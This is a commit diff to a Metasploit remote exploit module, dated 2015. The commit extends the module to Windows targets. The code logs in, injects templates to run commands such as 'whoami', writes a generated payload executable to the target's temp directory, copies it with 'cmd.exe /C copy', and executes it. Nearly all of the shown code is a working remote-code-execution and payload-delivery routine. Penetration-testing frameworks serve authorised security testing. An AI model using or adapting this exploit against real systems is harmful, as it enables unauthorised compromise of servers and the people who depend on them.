Support Win/Linx/Java payloads for Win/Linux platforms

bug/bundler_fix
wchen-r7 2015-12-03 14:02:32 -06:00
parent 83824b2902
commit f33e63c16f
1 changed files with 41 additions and 9 deletions

View File

@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
def do_explicit_check def do_explicit_check
begin begin
cookie = do_login cookie = do_login
# I don't really care which command to execute, as long as it's a valid one. # I don't really care which command to execute, as long as it's a valid one for both platforms.
# If the command is valid, it should return {"message"=>"0"}. # If the command is valid, it should return {"message"=>"0"}.
# If the command is not valid, it should return an empty hash. # If the command is not valid, it should return an empty hash.
c = get_exec_code('whoami') c = get_exec_code('whoami')
@ -382,7 +382,13 @@ class Metasploit3 < Msf::Exploit::Remote
# @param new_fname [String] The new file # @param new_fname [String] The new file
# @return [String] # @return [String]
def get_dup_file_code(fname, new_fname) def get_dup_file_code(fname, new_fname)
get_exec_code("cp #{fname} #{new_fname}") if fname =~ /^\/[[:print:]]+/
cp_cmd = "cp #{fname} #{new_fname}"
else
cp_cmd = "cmd.exe /C copy #{fname} #{new_fname}"
end
get_exec_code(cp_cmd)
end end
@ -431,7 +437,13 @@ class Metasploit3 < Msf::Exploit::Remote
def target_platform_compat?(target_platform) def target_platform_compat?(target_platform)
target.platform.names.grep(/#{target_platform}|java/i).empty? ? false : true target.platform.names.each do |n|
if /^java$/i === n || /#{n}/i === target_platform
return true
end
end
false
end end
@ -452,11 +464,7 @@ class Metasploit3 < Msf::Exploit::Remote
c = get_temp_path_code c = get_temp_path_code
res = inject_template(c, cookie) res = inject_template(c, cookie)
json = res.get_json_document json = res.get_json_document
if json['message'] json['message'] || ''
return json['message']
end
''
end end
def get_java_home_path(cookie) def get_java_home_path(cookie)
@ -496,6 +504,30 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit_as_windows(cookie) def exploit_as_windows(cookie)
tmp_path = get_tmp_path(cookie)
if tmp_path.blank?
fail_with(Failure::Unknown, 'Unable to get the temp path.')
end
exe = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)
exe_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
exe_new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
exe_fname.gsub!(/Program Files/, 'PROGRA~1')
exe_new_fname.gsub!(/Program Files/, 'PROGRA~1')
register_files_for_cleanup(exe_fname, exe_new_fname)
print_status("Attempting to write #{exe_fname}")
c = get_write_file_code(exe_fname, exe)
inject_template(c, cookie)
print_status("New file will be #{exe_new_fname}")
c = get_dup_file_code(exe_fname, exe_new_fname)
inject_template(c, cookie)
print_status("Executing #{exe_new_fname}")
c = get_exec_code(exe_new_fname)
inject_template(c, cookie)
end end
@ -542,7 +574,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Target being detected as: #{target_platform}") print_status("Target being detected as: #{target_platform}")
unless target_platform_compat?(target_platform) unless target_platform_compat?(target_platform)
fail_with(Failure::BadConfig, 'Selected target does not match the target.') fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')
end end
case target.name case target.name